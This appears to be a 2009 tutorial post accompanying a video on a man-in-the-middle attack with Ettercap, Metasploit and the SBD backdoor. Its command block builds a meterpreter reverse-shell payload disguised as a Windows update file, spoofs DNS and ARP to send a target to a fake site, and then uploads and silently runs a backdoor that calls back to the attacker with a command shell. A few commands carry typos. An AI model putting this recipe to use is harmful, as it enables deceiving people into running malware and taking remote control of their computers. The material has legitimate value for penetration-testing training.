Links
Watch video on-line: http://g0tmi1k.blip.tv/file/2319124
Download video: http://www.mediafire.com/download.php?ml5lto4ykyq
Commands: http://pastebin.com/f6f4a936


What is this?
By setting up a fake web site, we social engineer our target to run our exploit. The end result gives us command line access to our target's PC.


How does this work?

> Ettercap to do the MITM Attack
> Metasploit for the exploit
> Secure BackDoor (SBD) for the backdoor
> Apache for the web server


What do I need?
> Ettercap
> Metasploit
> A web server
> SBD (optional)
*all of this is on backtrack 4*


Network Setup:
Attackers IP: 192.168.1.104
Targets IP: 192.168.1.101
Gateway IP: 192.168.1.1


Software
Name: Ettercap
Version: 0.7.3
Home Page: http://ettercap.sourceforge.net
Download Link: http://prdownloads.sourceforge.net/e...ar.gz?download

Name:Metasploit
Version: 3.3
Home Page: http://www.metasploit.com/
Download Link: http://prdownloads.sourceforge.net/e...ar.gz?download

Name: SBD
Version: 1.36
Home Page: http://tigerteam.se
Download Link: http://prdownloads.sourceforge.net/e...ar.gz?download
Source: http://www2.packetstormsecurity.org/...earchvalue=sbd


Commands:
Code:
/pentest/exploits/framework3/msfpayload/meterpreter/reverse_tcp LHOST=192.168.1.104 X > /var/www/Windows-KB183905-x86-ENU.exe
kate /var/www/index.html
>*Relace filename with new one, Windows-KB183905-x86-ENU.exe*
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcper
SET LHOAT 192.168.1.104
exploit

cd /usr/share/ettercap/mv -f etter.dns etter.dns.old
kate etter.dns
> * A 192.168.1.104
ettercap -i wlan0 -T -q -P dns_spoof -M ARP /http://192.168.1.1/ /http://192.168.1.101/

upload /root/tools/backdoors/sbd-1.36/sbd.exe C:/
execute -H -f "C:/sbd.exe -q -r 10 -k g0tmi1k -e cmd -p 7332 192.168.1.104"

wine /root/tools/backdoors/sbd-1.36/sbd.exe -l -k g0tmi1k -p 7332
Notes:
Sorry for the poor video editing on this one - it is cut from a final video called "g0tmi1k's home network" which is still incomplete.

Video length: 06:57
Capture length: 7:40
Song: Mr. Scruff - Is He Ready, Mr. Scruff - Get a Move On

Blog Post: http://g0tmi1k.blogspot.com/2009/07/videotutorial-man-in-middle-mitm-attack.html
Forum Post: http://forums.remote-exploit.org/bt4-videos/27173-video-man-middle-mitm-attack-ettercap-metasploit-sbd.html



~g0tmi1k